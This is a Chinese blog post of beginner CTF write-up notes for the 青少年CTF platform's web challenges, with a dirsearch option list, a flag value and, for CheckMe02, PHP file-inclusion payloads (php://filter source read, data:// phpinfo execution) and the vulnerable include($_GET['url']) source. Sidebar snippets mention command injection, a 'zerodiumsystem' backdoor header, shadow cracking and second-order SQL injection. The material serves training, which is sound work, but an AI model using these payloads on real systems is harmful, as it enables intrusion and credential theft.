青少年CTF_WEB

已于 2023-01-18 21:48:21 修改
阅读量544 收藏 4
点赞数
分类专栏: CTF WP 文章标签: python
于 2023-01-17 22:30:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cfy2401926342/article/details/128721325
版权
Dirsearch是一个强大的Web应用程序目录扫描工具,支持自定义URL列表、字典、扩展名和多线程扫描。它可以用于发现隐藏的Web资源,如未公开的页面、文件和子目录。通过调整参数如延迟、排除特定状态码或使用代理,可以进行更精细的扫描控制。此外,它还提供多种输出格式,包括简单报告、纯文本报告和JSON格式。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

web菜狗初学笔记

Web签到

目录扫描工具-dirsearch

参数列表:
-h, --help 查看帮助
-u URL, --url=URL 设置url
-L URLLIST, --url-list=URLLIST 设置url列表
-e EXTENSIONS, --extensions=EXTENSIONS 网站脚本类型
-w WORDLIST, --wordlist=WORDLIST 设置字典
-l, --lowercase 小写
-f, --force-extensions 强制扩展字典里的每个词条
-s DELAY, --delay=DELAY 设置请求之间的延时
-r, --recursive Bruteforce recursively 递归地扫描
–scan-subdir=SCANSUBDIRS, --scan-subdirs=SCANSUBDIRS 扫描给定的url的子目录(用逗号隔开)
–exclude-subdir=EXCLUDESUBDIRS, --exclude-subdirs=EXCLUDESUBDIRS 在递归过程中排除指定的子目录扫描(用逗号隔开)
-t THREADSCOUNT, --threads=THREADSCOUNT 设置扫描线程
-x EXCLUDESTATUSCODES, --exclude-status=EXCLUDESTATUSCODES 排除指定的网站状态码(用逗号隔开)
-c COOKIE, --cookie=COOKIE 设置cookie
–ua=USERAGENT, --user-agent=USERAGENT 设置用户代理
-F, --follow-redirects 跟随地址重定向扫描
-H HEADERS, --header=HEADERS 设置请求头
–random-agents, --random-user-agents 设置随机代理
–timeout=TIMEOUT 设置超时时间
–ip=IP 设置代理IP地址
–proxy=HTTPPROXY, --http-proxy=HTTPPROXY 设置http代理。例如127.0.0.1:8080
–max-retries=MAXRETRIES 设置最大的重试次数
-b, --request-by-hostname 通过主机名请求速度,默认通过IP
–simple-report=SIMPLEOUTPUTFILE 保存结果,发现的路径
–plain-text-report=PLAINTEXTOUTPUTFILE 保存结果,发现的路径和状态码
–json-report=JSONOUTPUTFILE 以json格式保存结果

 

 Flag在哪里?

view-source:  查看源码

Robots 

robots.txt

 POST&GET

get  、post 传参

qsnctf{e36e4d9c-8bc0-483e-8ce3-853d1f776355}

 CheckMe01

 

 

CheckMe02

文件包含, php伪协议可以查看到index.php的源码的base64:

?url=php://filter/read=convert.base64-encode/resource=index.php
PHRpdGxlPkNoZWNrTWUtMDI8L3RpdGxlPg0KPD9waHANCnByaW50KCI8aDE+5qyi6L+O5p2l5YiwQ2hlY2tNZS0wMu+8jOW/q+adpeWvu+aJvuS9oOeahEZsYWflubbmj5DkuqTlkKfjgII8L2gxPiIpOw0KPz4NCjw/cGhwDQplcnJvcl9yZXBvcnRpbmcoMCk7DQokdXJsPSRfR0VUWyd1cmwnXTsNCmlmKGlzc2V0KCR1cmwpKXsNCiAgICBpbmNsdWRlKCR1cmwpOw0KfQ0KICAgIA0KPz4NCjxodG1sIGxhbmc9InpoLUNOIj4NCjw/cGhwDQogICAgICAgICAgICANCiAgICAgICAgICAgICRjb2RlPSI8P3BocCBpbmNsdWRlKCQiLiJfR0VUWyd1cmwnXSk7Pz4iOw0KICAgICAgICAgICAgaGlnaGxpZ2h0X3N0cmluZygkY29kZSk7DQogICAgPz4NCg==

 

<title>CheckMe-02</title>
<?php
print("<h1>欢迎来到CheckMe-02,快来寻找你的Flag并提交吧。</h1>");
?>
<?php
error_reporting(0);
$url=$_GET['url'];
if(isset($url)){
    include($url);
}
    
?>
<html lang="zh-CN">
<?php
            
            $code="<?php include($"."_GET['url']);?>";
            highlight_string($code);
    ?>

 

读取phpinfo():

?url=data:text/plain,<?php phpinfo();?>

参考大佬博客

[青少年CTF]Web-CheckMe01-04 writeup by q1jun_q1jun的博客-CSDN博客

或者查看根目录下的flag

 2个SQL

wp写的挺详细

青少年CTF-Web-2个SQL - 青少年CTF初学者起源地 | 青少年CTF论坛

青少年CTF-Web-Easy PingMe攻略
小苏
11-30 1124
分号字符,决定使用这个符号进行操作,经过这条命令可以得知本目录下还有一个文件名为【flag.php】,猜测flag就在该文件中,所以使用【1.1.1.1;这是因为他是php语言,且将flag赋值在了变量中,并没有将它进行输出!第二步:开始尝试注入,先测试是否会过滤一些字符之类的操作 这里以【1.1.1.1;见怪不怪了,尝试【CTRL+U】查看源代码看看是否有什么东西出现!end:遇到命令注入的可以尝试【;前言:根据题目意思得知该题目为命令执行【命令注入】第一步:启动靶场,然后打开链接查看原型。
[青少年 CTF] Web签到
piggcs的博客
04-03 724
扫出一个备份文件/index.php.bak,在地址输入/index.php.bak。输入指令python dirsearch.py -u http://xxxx。命令行输入 python,返回版本号则安装成功(环境配置成功)。此工具是Python3工具,所以先要部署Python3环境。建议默认安装到C盘 且 勾选PATH(自动配置环境变量)。进入Python官网后找到自己想要的版本和相应的系统。自动下载一个文件,用记事本打开,得到flag。安装完成后 win+r 输入 cmd。
青少年CTF训练平台 Web-Easy PingMe02
xingjinhao123的博客
10-22 1672
青少年CTF训练平台 Web-Easy PingMe02
[青少年CTF] easy_web 详解+避坑
明裕学长的博客
03-13 5042
这里坑就来了我们需要使用hackbar先进行一次post传递搭配burp抓包。希望小伙伴们可以一步一步的复现而不是直接填flag那样是没有效果滴!注意这里的回显结果不能出现md5 is funny ~发现它经过了两次base64编码和一次十六进制编码。我们反向操作一波查看index.php的源码。这里可以将img=删除因为我们已经绕过了。这里的%20是url编码是空格。下面在搭配../进行目录遍历。接着我们将post参数替换成。这让我联想到地址栏中的参数。下面我们进行了l\s绕过。解开后发现是图片源码。
青少年CTF平台 Web签到
zxsctf的博客
10-09 4113
Web一星简单题,Web签到。直接启动环境,等待30秒左右访问题目链接。
[青少年CTF]Web—Easy CheckMe1-8 by 周末
个人文章分享
12-03 2630
web部分CheckMe1-8,仅供参考
Web青少年CTF擂台挑战赛 2024 #Round 1 wp
uuzeray的博客
03-01 2704
好家伙,比赛结束了还有一道0解web题是吧(随缘写点wp(简单过头,看个乐就好)
青少年CTF-Web-CheckMe01
zxsctf的博客
10-09 1949
半颗星的简单题,CheckMe01启动题目,并访问。
青少年CTFweb
最新发布
qq_75120258的博客
05-29 1118
在一次惊心动魄的太空任务中,你发现了一个隐藏在偏远太空站内部的高度机密的加密密钥。这个密钥可能拥有解锁重要情报的能力,但是要获取它并不是一件简单的事情。这个密钥被放置在一台极其严密防护的计算机系统中。这台计算机不仅与外界网络完全隔离,而且还设置了多重安全机制,包括身份验证,层层难关等。你作为一名出色的太空探险家,要想成功获取密钥,你必须设法绕过这些安全防护,利用你的专业知识和创造力,想办法通过一些巧妙的方式访问这台计算机,并成功获取隐藏的密钥。准备好你的大脑,开始你的穿梭之旅吧!
青少年CTF平台-Web-PingME
zxsctf的博客
10-09 1604
题目难度一颗星,五十分。
青少年CTF训练平台 Web-Easy Web签到
xingjinhao123的博客
10-17 1566
青少年CTF训练平台 Web-Easy Web签到
青少年CTF平台-Web-POST&GET
zxsctf的博客
10-09 613
一星简单题,看我如何给你过了。启动环境,等待三十秒先喝口水。
青少年CTF训练平台Web签到
Fenghe2的博客
04-17 302
随后用dirsearch 扫了一下目录发现index.php.bak备份文件。访问index.php.bak成功获得flag。burp抓包看了看响应头 也什么都没发现。打开页面f12大法 什么都没发现。
青少年CTF训练平台-WEB-部分wp
SwBack的博客
04-04 2961
扫描发现备份文件 打开发现flag直接上传,然后获取flag木马地址,通过扫描目录发现。直接添加请求头user-agentt: zerodiumsystem(‘cat /flag’);连接之后,查找具有权限的命令根据提示直接发现flag 提示说明没有中文但是仍然错误,查看shadow,通过john破解密码 用户名后有$y,则表明密码已使用 yescrypt 进行哈希处理指定format参数 新手的登录 使用提示的user账号登录之后抓包修改cookie为admin。发包,得到flag访问之后直接查看js
Web青少年CTF练习平台-文章管理系统
cq_tanyu的博客
02-21 2032
在这道题上面困了有一会儿,之前一直拿到的是假FLAG,所以简单记录一下 直接尝试用SQLmap跑 后在数据库word表的articles列 拿下FLAG: 得到假的FLAG 根据提示 尝试转换思路,用SQLmap执行shell 查找“flag” 发现目录,拿下FLAG
青少年CTF-Web-帝国CMS1-3通关记录
zxsctf的博客
12-08 1847
本次进通过平台内题目进行,非真实环境。 首先下发题目链接我们首先先找后台看看后台地址为随后,经过dirsearch进行扫描,得到了一个www.zip 访问扫描到的www.zip,得到网站源码使用D盾扫描,得到eval后门。蚁剑链接得到根目录的Flag这道题目和CMS01差不多,但是好像又有天差地别管理员发现你入侵了他的服务器,管理员修改了密码并删除了后门那么我们优先尝试管理员是不是给了一个弱口令经过弱口令爆破登陆成功密码为123456789这道题目考察了一个帝国CMS的漏洞利用,我们先看看帝国CMS03有什
青少年ctf 2个SQL ctf平台
weixin_69830800的博客
06-08 438
虽然修改的是admin'#的密码,但是由于存在sql注入,导致最后实际被修改的是admin的密码。于是去注册一个账号,不过结合题目所说2个sql,所以我们在注册的时候账号名注册为。我们这题目的思路是,先观察,发现 有个注册,修改完成后,我们去登录admin。密码就是123456(修改后的)登录admin后flag就出来了。于是乎统统改为123456。注册完成后登录这个账号。
{青少年CTF} Web签到 详解
lfc18950509270的博客
07-26 1364
又是除了几个字外一片空白,可能有的同学照例打开源代码看了起来,但是什么也没发现。这时候,我们可能就需要看一下它的目录下有没有什么文件里藏着flag。可以发现,扫描出目录下存在一个加index.php.bak的文件,直接复制到浏览器中,下载得到它,直接打开即可发现flag。至于它的安装和使用方法你们可以自己搜一下,或者你们需要在找个时间单独写一篇。这边使用的命令是dirsearch -u ,u指的就是url的意思。这样我们又有了一种思路可以拿到flag了,虽然也比较简单。进入之后可以看到是长这样的。
[青少年CTF]Web-CheckMe01-04 writeup by q1jun
ShangYaoPaiGu的博客
11-29 1950
在是科学计数的语法,0e后面不管多大都是0。那说明还可以通过日志来解析PHP语句。字符进行base64编码才能使。这里通过0e截断可以做到,因为。但是还是可以读取到文件,比如。这题把php伪协议过滤了。然后再通过文件包含漏洞访问。只能为数字,然后他们各自的。值如果想等就输出flag。还是文件包含题目,相比于。语句的http请求来写入。来拦截请求包,修改里面的。php伪协议可以查看到。
青少年ctf web unserialize
08-28
青少年 CTF(Capture The Flag)比赛是一个针对青少年的网络安全竞赛。在 CTF 中的 Web 题目中,可能会涉及到反序列化(unserialize)漏洞。 反序列化漏洞是一种常见的安全问题,它发生在将数据从序列化的状态...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

知源书院

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值